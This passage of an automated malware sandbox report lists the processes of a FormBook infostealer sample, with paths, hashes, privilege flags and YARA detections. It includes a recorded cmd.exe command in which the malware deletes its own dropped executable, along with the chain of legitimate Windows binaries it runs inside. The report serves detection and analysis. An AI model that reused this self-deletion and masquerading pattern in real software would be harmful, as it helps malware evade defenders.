                                                                                          File size:772608 bytes
                                                                                          MD5 hash:4A595C5540F0A097A5F11159CDF5C015
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:16:59:11
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                          Imagebase:0x9e0000
                                                                                          File size:42080 bytes
                                                                                          MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, Metadefender, Browse
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Start time:16:59:21
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:
                                                                                          Imagebase:0x7ff6f22f0000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:16:59:33
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                                          Imagebase:0x1190000
                                                                                          File size:143360 bytes
                                                                                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Start time:16:59:37
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                          Imagebase:0x2a0000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:16:59:38
                                                                                          Start date:26/01/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff61de10000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >